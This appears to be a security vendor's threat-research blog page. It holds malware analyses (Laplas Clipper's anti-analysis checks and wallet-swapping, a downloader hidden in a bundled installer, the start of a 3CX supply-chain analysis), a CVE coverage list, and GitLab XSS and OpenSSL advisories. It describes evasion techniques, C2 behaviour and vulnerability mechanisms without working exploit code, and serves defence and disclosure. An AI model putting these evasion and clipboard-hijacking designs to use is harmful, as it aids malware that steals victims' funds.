Posts

Laplas Clipper Strikes Again: With Anti Analysis Techniques

Recently, SonicWall Capture Labs threat research team has come across a new C++ based variant of Laplas Clipper which targets the cryptocurrency users. Laplas clipper have been observed in the past using .NET and GO language variants. In this variant, the malware employs various anti debug, anti sandbox and anti analysis techniques to evade detection. 

The malware’s main purpose is to exchange victim’s cryptocurrency wallet address with the threat actor’s provided wallet address, so that it can receive the payments by tricking the user. 

Analysis: 

Before starting main activity, malware performs anti checks to evade detection and stops its execution if any condition is not satisfied.

Anti Sandbox():

  • No. of Processor: SYSTEMINFO structure contains information about current computer system. This includes the architecture, type of the processor, the number of processors in the system, the page size, and other such information. 

          Malware checks NumberOfProcessors field which should be more than 1 processor. 

  • GlobalMemoryStatusEx API retrieves information about the system’s current usage of both physical and virtual memory. MEMORYSTATUSEX structure contains field ullTotalPhys which contains total size of actual physical memory in Bytes. 

          Malware check ullTotalPhys field which should be more than 2 GB. 

  • DeviceIoControl sends a control code (this case 0x70000 corresponds to IOCTL_DISK_GET_DRIVE_GEOMETRY) directly to a specified device driver.  

_DISK_GEOMETRY structure contains the media type, number of cylinders, tracks per cylinder, sectors per track, and bytes per sector.  

Malware uses _DISK_GEOMETRY struct to calculate total size of hard disk in bytes, which should be more than 80GB to continue its execution otherwise it will stop its execution. 

 Anti Analysis():

  • IsDebuggerPresent(): Determines whether the current process is being debugged by a user-mode debugger such as OllyDbg or x64dbg. 
  • CreateToolhelp32Snapshot(): Malware obtains the list of currently running processes on the system and compares the executable name associated with them against the following list of executable file names associated with common analysis tools as listed below.

ida.exe, x32dbg.exe, x64dbg.exe, ida64.exe, wireshark.exe, netstat.exe, netmon.exe, tcpview.exe, filemon.exe, regmon.exe  

 

  • IsNonWritableinCurrentImage(): If a process is running under a debugger and an invalid handle is passed to the API ntdll!NtClose or API kernel32!CloseHandle, then the EXCEPTION_INVALID_HANDLE (0xC0000008) exception will be raised. The exception can be catch by an exception handler. If the control is passed to the exception handler, it indicates that a debugger is present.
  • NtDelayExecution(): Suspends execution for specified nano seconds. 
  • GetTickCount64(): Measures elapsed time between functions calls and if difference is less than specified value then malware knows it executing under controlled environment and stops it execution. 

After performing all the above functions malware checks whether it is running from the %Appdata% folder. If not, then it copies bloated copy of itself (701 MB) into %Appdata% by appending random bytes as overlay. Malware does this to evade scanning from various security software which is recently seen in Emotet malware family. 

 

Malware adds itself to a Autoruns entry for persistence: 

Malware executes from %Appdata% through command line using API ShellExecuteA:

Wallet Address Exchange:

Malware starts decrypting all encrypted strings, regular expression(regex) for cryptocurrency wallet addresses and c2 URL. 

Malware sends GET request to download regex from the c2 server: 

Regex belongs to the below currency wallet address:

Cyptocurrency Regular Expression
Bitcoin (BTC) ^(?:(1[1-9A-HJ-NP-Za-km-z]{32,33})
Bitcoin (BTC) (3[1-9A-HJ-NP-Za-km-z]{32,33})
Bitcoin (BTC) (bc1q[023456789acdefghjklmnpqrstuvwxyz]{38,58})
Bitcoin Cash (BCH) (q[a-z0-9]{41})
Bitcoin Cash (BCH) (p[a-z0-9]{41})
Litecoin (LTC) (L[a-km-zA-HJ-NP-Z0-9]{33})
Litecoin (LTC) (M[a-km-zA-HJ-NP-Z0-9]{33})
Litecoin (LTC) (ltc1q[a-zA-Z0-9]{38})
Ethereum (ETH) (0x[a-fA-F0-9]{40})
Binance coin (BNB) (bnb1[0-9a-z]{38})
Dogecoin (DOGE) (D[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32})
Monero (XMR) (4[0-9AB][1-9A-HJ-NP-Za-km-z]{93})
Monero (XMR) (8[0-9AB][1-9A-HJ-NP-Za-km-z]{93})
Ripple (XRP) (r[0-9a-zA-Z]{33})
Tezos (t1[a-km-zA-HJ-NP-Z1-9]{33})
Dash (DASH) (X[1-9A-HJ-NP-Za-km-z]{33})
Ronin (RON) (ronin:[a-fA-F0-9]{40})
Tron (TRX) (T[A-Za-z1-9]{33})
Tezos (XTZ) (tz[1-3][1-9A-HJ-NP-Za-km-z]{33})
Cardano (ADA) (addr1[a-z0-9]+)
Cosmos (ATOM) (cosmos1[a-z0-9]{38})
Ripple (XRP) (R[a-zA-Z0-9]{33})
UNKNOWN ([A-Z2-7]{58})
UNKNOWN ([1-9A-HJ-NP-Za-km-z]{44}))$

After receiving regex list, malware register itself to c2 server by sending GET request containing guid (computer name\\username) and key which is encrypted using simple XOR in malware. 

Malware runs in infinite loop while searching for the cryptocurrency wallet address in the clipboard buffer using regular expressions. Malware uses GetClipboardData and SetClipboardData API’s to fetch and replace clipboard data respectively. 

If malware founds valid wallet address in clipboard, then it sends GET request to obtain similar threat actor’s wallet address, so that malware can replace it with original victim’s wallet address and receive the payment send by victim. 

After receiving similar wallet address from c2 server, Malware replaces it with victim’s wallet address: 

Although the malware has smaller functionality it may cause huge financial losses to victims.

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

IOC: 

634129f11f0b78602fe43104fa0b8b987bfbecb0670d078db870e7acceed8831 

Unveiling the Hidden Threat: Malware Disguised as Trusted Downloads

The SonicWall Capture Labs threat research team has observed and analyzed a new malware which is distributed along with legitimate software such as Advanced Port Scanner. The malware has the ability to download and execute additional malware payload, as well as receive and execute commands from a remote command and control server. 

This malware comes bundled with a legitimate software such as the Advanced Port Scanner. One of the bundled components is a malicious dll named, ssleay32.dll, which is a commonly used library for open source projects such as OpenSSL and Qt.

Analysis: 

Upon execution of the main Setup.exe, it loads the malicious packed DLL (ssleay32.dll) into memory. 

Stage 1: 

Dll code is obfuscated with fake API calls: 

Once DLL get loaded into memory, it decodes Base64 encoded shellcode on to Heap and start execution from heap. Shellcode contains the encrypted downloader module which is later decrypted using Tiny Encryption Algorithm. 

Malware uses API hashing for resolving the API addresses. Library names and API names are stored as CRC32 hash and they are resolved at runtime: 

After the decryption of the downloader module, malware injects it into newly created suspended process “explorer.exe”. Malware uses Process Hollowing technique to inject downloader module in “explorer.exe”: 

Stage 2:

Command and Control (C2) Server communication:  

At this point, the downloader starts its execution by sending Get request to the C2 Server: 

Downloader prepares Get c2 request with domain “chap-domain[.]com” which is hardcoded in binary. Malware configuration is encrypted using RC4 algorithm which is decrypted at runtime. Malware uses three different RC4 keys for each different operation. RC4 keys are stored in .data section of binary. Malware uses an implementation of Mersenne Twister Random Number Generator (MTRNG) to generate random values for the query string “%s?a=%s&id=%s”.

Snapshot of CyberChef Tool shows the decryption of Malware configuration using RC4 Algorithm:

Get Request sent to C2: 

C2 Response Decrypted: 

Downloader uses open source RapidJSON C++ library to parse C2 response. 

C2 response contains various commands and options to carry out further execution 

{ 

    “postback”: “true”,                                         <– Response Back is True 

   “geo”: “IN”, <– Geo Location 

    “crypto_domain”: “false”, 

    “powershell”: “false”,                                     <– PowerShell Commands to execute 

    “moderation”: “false”, 

    “postback_id”: “false”, 

    “postback_url”: “post-make.com”,             <– Domain to send another Get Request 

    “postback_path”: “c4fel7k.php?cnv_id=” <– URL Path  

} 

At the time of analysis c2 server did not respond with other available commands. 

Malware has capabilities to download file and execute it from URL sent by c2 server. 

Below code snippet shows the ability to download file from URL and save into temporary path:

Below code snippet shows the execution of downloaded file as a new process:

Following code snippet shows the execution of PowerShell commands received from C2:


SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

Indicators of Compromise (IOC):

DLL files

938cafbfd9c84f2db9e391d102982c64175af490283ee68e10e621cae886a885
332523f94c37396b7153883e294d714f13e18b5026986c7a1d7f861d58cf610f
33687ee592b099fe341a7c8eae0369f9375b52ce4622cf98a6db0372023dc31e
ca0e784c1aaed612f264135f655e17476ade7077801aa01b5e055768236c3bdf
ca96a44effbdb6a995dacd109eb57f7ad5bbef69ac1699244190eeabfe1ad72a
7b65e764f78e0ce82bef0785758512890ad2bf768ed27c3e42b44b3af91956bf
8365ad9f6f1f7ccb6d3e45ef21be0472ff98c1e8d8f9cb6d8ec22b2632f92743
9d706ec7fcfb0b12db84c2d733f8120804c2ab55475ce610f1bef186be587249
b111ad556bc72b1a48bd4b30a62bd7696f6532d6c5694701015013abe72577a7
938cafbfd9c84f2db9e391d102982c64175af490283ee68e10e621cae886a885
8c96bb583bcbe85b1d05071771a6b6be25bb43af705ca4f8ea87ffb9751ddad4
a7123ca2efb1faa7347fa7f7002ab3763880762db0522bb200d3e869882a3954
7de5a0ca3a10e4e560ef072b63e55e9729c208a8bcee450becfa960cdd27aa53
da78a9e850da9c05833fd099c687a4f180b2616db7e87db7ccf3cb33232501f1
3ea5b5d31972d766ee107ad8ba67bc4586b58718f0f4997ebe91182a2f261d1d
d9488f6deab5c07f84d0c05a151970aaf67e637ed1456d9fd61401c756c6f070
d40ec00f3695818024496fb770e15fcee45677d481b81f54705e133319f2bf90
928ff06e101981e1dd4db46ca3e3f38d7896e99a4b9517c1628ab84a5c0d0247
2f7d2feaf87023af233d2f0fd97b45e8df62304bdbb4c7a02b1cee58c80911f2
5470c5fed4d8201d4e3f41922c38b336ac5e6a2a2c163b3afc403fdc6a30c65d
41bfc00cb7987adb691673335018dd45f1250464b9270514f09aa9c5cb8fcbb2

Microsoft Security Bulletin Coverage for April 2023

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of April 2023. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2023-21554 Microsoft Message Queuing Remote Code Execution Vulnerability
IPS 3699: Microsoft Message Queuing RCE (CVE-2023-21554)

CVE-2023-24912 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 436: Exploit-exe exe.MP_315

CVE-2023-28218 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
ASPY 437: Exploit-exe exe.MP_316

CVE-2023-28219 Layer 2 Tunneling Protocol Remote Code Execution Vulnerability
IPS 3701: Windows L2TP Handling RCE (CVE-2023-28219)

CVE-2023-28220 Layer 2 Tunneling Protocol Remote Code Execution Vulnerability
IPS 18418: Windows L2TP Handling RCE (CVE-2023-28220)

CVE-2023-28266 Windows Common Log File System Driver Information Disclosure Vulnerability
ASPY 433: Exploit-exe exe.MP_313

CVE-2023-28274 Windows Win32k Elevation of Privilege Vulnerability
ASPY 434: Exploit-exe exe.MP_314

CVE-2023-28252 Windows Common Log File System Driver Elevation of Privilege Vulnerability
This CVE is used in ransomware attacks which is covered by GAV:Nokoyawa.RSM

Adobe Coverage:
CVE-2023-26417 Acrobat Reader arbitrary code execution
ASPY 438: Malformed-pdf pdf.MP_509

CVE-2023-26406 Acrobat Reader security feature bypass
ASPY 435: Malicious-js js.MP_28

The following vulnerabilities do not have exploits in the wild :
CVE-2023-21727 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21729 Remote Procedure Call Runtime Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21769 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-23375 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-23384 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24860 Microsoft Defender Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-24883 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-24884 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24885 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24886 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24887 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24893 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24914 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-24924 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24925 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24926 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24927 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24928 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24929 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24931 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-28216 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28217 Windows Network Address Translation (NAT) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-28221 Windows Error Reporting Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28222 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28223 Windows Domain Name Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28224 Windows Point-to-Point Protocol over Ethernet (PPPoE) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28225 Windows NTLM Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28226 Windows Enroll Engine Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28227 Windows Bluetooth Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28228 Windows Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-28229 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28232 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28233 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-28234 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-28235 Windows Lock Screen Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28236 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28237 Windows Kernel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28238 Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28240 Windows Network Load Balancing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28241 Windows Secure Socket Tunneling Protocol (SSTP) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-28243 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28244 Windows Kerberos Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28246 Windows Registry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28247 Windows Network File System Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-28248 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28249 Windows Boot Manager Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28250 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28251 Windows Driver Revocation List Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28253 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-28254 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28255 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28256 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28260 .NET DLL Hijacking Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28262 Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28263 Visual Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-28267 Remote Desktop Protocol Client Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-28268 Netlogon RPC Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28269 Windows Boot Manager Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28270 Windows Lock Screen Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28271 Windows Kernel Memory Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-28272 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28273 Windows Clip Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28275 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28276 Windows Group Policy Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28277 Windows DNS Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-28278 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28285 Microsoft Office Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28287 Microsoft Publisher Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28288 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-28291 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28292 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28293 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28295 Microsoft Publisher Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28296 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28297 Windows Remote Procedure Call Service (RPCSS) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-28298 Windows Kernel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-28299 Visual Studio Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-28300 Azure Service Connector Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-28302 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-28304 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28305 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28306 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28307 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28308 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28309 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-28311 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-28312 Azure Machine Learning Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-28313 Microsoft Dynamics 365 Customer Voice Cross-Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-28314 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.

GitLab CE and EE Kroki Diagram Stored XSS Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  GitLab is a web-based platform for software development and collaboration, offering a comprehensive suite of tools for version control, continuous integration, and continuous deployment. It comes in two editions: Community Edition (CE) and Enterprise Edition (EE).

  The Community Edition is an open-source, self-hosted solution that provides core features for project management, code repositories, and collaborative development. It’s suitable for smaller teams, individual developers, and organizations that require basic functionality. The Enterprise Edition, on the other hand, is a commercial offering that includes all the features of the Community Edition, along with advanced features tailored to the needs of larger organizations and enterprises. EE offers enhanced security, compliance, and performance, as well as premium support options. This edition is available in different tiers, such as Premium and Ultimate, to cater to varying business requirements and budgets.

  A cross site scripting vulnerability has been reported in GitLab Community and Enterprise Editions. The vulnerability is due to improper validation of user input of kroki diagrams.

  A remote, authenticated attacker could exploit these vulnerabilities by sending crafted requests to the target server. Successful exploitation could result in arbitrary script execution under the security context of the target user’s browser.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-0050.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 6.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L/E:U/RL:O/RC:C).

  Base score is 7.4 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is low.
    • Impact of this vulnerability on data integrity is low.
    • Impact of this vulnerability on data availability is low.
  Temporal score is 6.4 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  GitLab’s kroki diagram generation process enables users to create and embed various types of diagrams within their documentation using GitLab Flavored Markdown (GFM) or CommonMark formatting. Kroki supports a wide range of diagramming languages, such as PlantUML, Graphviz, Mermaid, and more, making it a versatile and valuable tool for developers to visually represent complex ideas and workflows. While this feature enhances GitLab’s capabilities, it also introduces potential security risks, as demonstrated by the stored XSS vulnerability discussed below.

  A stored cross-site scripting (XSS) vulnerability is a type of security flaw that allows an attacker to inject malicious scripts into a web application. These scripts are then executed in the context of the user’s browser. In the case of GitLab, this vulnerability is reported to stem from improper input sanitization during the kroki diagram generation process. Input sanitization is a critical security measure involving the removal or modification of user inputs to prevent malicious code execution within the application.

  The vulnerability in GitLab occurs when code is processed and the “pre (lang)” attribute is copied to the “img (data-src)” attribute without proper escaping. Attackers can exploit this by using a “(pre)(code)” HTML block instead of the standard code block syntax and providing a malicious “lang” attribute. The example below illustrates how Markdown HTML changes before and after post-processing, resulting in an altered data-src attribute that can be used to execute malicious code.

  To exploit this vulnerability, a remote, authenticated attacker would need to create a node with a malicious description within GitLab. If successful, this could result in arbitrary script execution in the target user’s browser, potentially leading to the compromise of sensitive information, unauthorized access, or other malicious activities.

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The attacker must have network connectivity to the affected ports.
  • The attacker must have authorized access to a user with the ability to submit GitLab markdown to a page.
  • The target system must have kroki diagrams enabled.

Triggering Conditions:

  The attacker authenticates to the target system as a user with the ability to submit GitLab markdown to a page. The authenticated attacker submits malicious markdown.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 3676 GitLab Kroki Diagram XSS 1

  • IPS: 3677 GitLab Kroki Diagram XSS 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Updating to a non-vulnerable version of the product.
    • Filtering attack traffic using the signature above.
    • Disabling kroki diagrams.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

OpenSSL CRL Verification Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Public Key Infrastructure (PKI) is a comprehensive framework for managing digital certificates and cryptographic keys, serving as the foundation for secure communication over the internet. PKI comprises of several components, such as Certificate Authorities (CAs), registration authorities, and end-user systems, all working together to create, distribute, store, and manage digital certificates. OpenSSL is an open-source software library that supports the implementation of PKI by providing a robust set of cryptographic functions, including the generation and management of digital certificates and keys, as well as secure communication protocols.

  Transport Layer Security (TLS) is a cryptographic protocol designed to ensure privacy and data integrity between applications communicating over a network. TLS relies on digital certificates, which follow the X.509 standard, to authenticate the identities of communicating parties and establish secure connections. The X.509 standard has evolved through different versions, with each enhancing the functionality of the previous one. The most widely used version is X.509 v3, which supports extensions for additional certificate features. Certificate Revocation Lists (CRLs) are a crucial aspect of maintaining the integrity of PKI, as they contain information about digital certificates that have been revoked, allowing applications to verify the trustworthiness of certificates before establishing secure connections.

  Abstract Syntax Notation One (ASN.1) is a language used for describing data structures that can be represented, encoded, transmitted, and decoded in a platform-independent manner. ASN.1 plays a significant role in defining the structure of X.509 certificates and CRLs, enabling their consistent interpretation across different systems. Distinguished Encoding Rules (DER) is a subset of ASN.1 that provides a specific, unambiguous encoding for these data structures. DER ensures that any given ASN.1-defined data structure has a unique binary representation, which is essential for the proper functioning of cryptographic processes, such as digital signature verification. Together, ASN.1 and DER contribute to the seamless and secure exchange of information across networks and systems.

  The GeneralName structure is defined using ASN.1 notation and consists of several types of names and identifiers, including:

    01. otherName: Represents an application-specific name, defined as an object identifier (OID) and a value.
    02. rfc822Name: Represents an email address.
    03. dNSName: Represents a domain name.
    04. x400Address: Represents an X.400 address, used in a specific type of email system.
    05. directoryName: Represents a distinguished name (DN) in the X.500 directory format.
    06. ediPartyName: Represents an Electronic Data Interchange (EDI) party name.
    07. uniformResourceIdentifier (URI): Represents a Uniform Resource Identifier, such as a URL or URN.
    08. ipAddress: Represents an IP address, either in IPv4 or IPv6 format.
    09. registeredID: Represents an object identifier (OID) registered to a specific entity.

  A type confusion vulnerability has been reported in OpenSSL. The vulnerability is due to improper X.400 address processing inside an X.509 GeneralName structure.

  A remote attacker could exploit the vulnerability by sending crafted traffic to the target system. Successful exploitation could result in denial of service or sensitive information disclosure.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-0286.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 5.7 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H/E:U/RL:O/RC:C).

  Base score is 6.5 (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is high.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is low.
    • Impact of this vulnerability on data integrity is none.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 5.7 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The type confusion vulnerability in OpenSSL arises from its handling of certificate verification with Certificate Revocation Lists (CRLs). During the SSL certificate verification process, the check_cert() method is called, and if the certificate contains a CRL Distribution Point extension with the X509_V_FLAG_CRL_CHECK flag set, the crl_crldp_check() function is executed.

  This function iterates through each Distribution Point in the certificate’s X.509 SEQUENCE, calling the idp_check_dp() function to compare the fullName with the one from the CRL. The process eventually calls the GENERAL_NAME_cmp() function to compare values from the X.509 certificate and the CRL. If the name utilizes the x400Address choice in the GeneralName, it calls the ASN1_TYPE_cmp() function for comparison. However, this function fails to validate the data payload before invoking ASN1_STRING_cmp(), leading to the use of arbitrary pointers in a memcmp call.

  Exploiting this vulnerability requires a remote attacker to provide both a malicious certificate and a malicious CRL. A successful attack can lead to a denial-of-service condition or the disclosure of memory content, which poses a significant risk to the security and stability of systems relying on OpenSSL for secure communications. Both TLS client and server applications are vulnerable, emphasizing the need for developers and administrators to take prompt action to address the issue.

Triggering the Problem:

  • The target must be running a vulnerable version of the affected product.
  • The attacker must have a malicious leaf certificate and a malicious CRL.
  • The target must trust the malicious CRL to verify the malicious leaf certificate.

Triggering Conditions:

  The attacker must be able to deliver a malicious certificate and a malicious CRL to the affected applications using OpenSSL library. The vulnerability is triggered when the CRL is used to verify the malicious certificate.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • TLS
    • DTLS
    • FTP
    • HTTP
    • HTTPS
    • IMAP
    • NFS
    • POP3
    • SMB/CIFS
    • SMTP
    • SMTPS
    • SIPS

  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 18961 OpenSSL X.400 Address Type Confusion 3

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Apply the vendor-provided patch to eliminate the vulnerability.
    • Filter attack traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

3CX Desktop App compromised in a supply chain attack

The SonicWall Capture Labs threat research team has observed and analyzed malware known as SmoothOperator that has been embedded within the 3CX VoIP desktop application. This is the result of the 3CX servers being compromised and the attackers gaining access to files that are publicly available for download by customers.  3CX is a popular Voice over Internet Protocol (VoIP) software that allows users to make and receive calls over the internet. It is a multi-platform conferencing application that offers features such as call recording, video conferencing, and integration with other communication tools like Microsoft Teams and Zoom.

 

 

Infection cycle:

 

An unsuspecting customer downloads the 3CX application onto their machine along with compromised DLLs “ffmpeg.dll” and “d3dcompiler_47.dll”.  “d3dcompiler_47.dll” contains malicious data appended after the security directory. When the user launches the 3CX application, it loads “ffmpeg.dll” which reads and executes malicious shellcode from “d3dcompiler_47.dll”.

 

Loader DLL

 

The size of the security directory of the “d3dcompiler_47.dll” is modified and the encrypted malicious data is added, after the security directory data. The loader DLL “ffmpeg.dll” creates event “AVMonitorRefreshEvent” to prevent multiple execution of malware instances. If the event already exists, the malware terminates the execution. The malware retrieves the parent process directory and looks for file “d3dcompiler_47.dll”, if the file is present the malware reads the file:

 

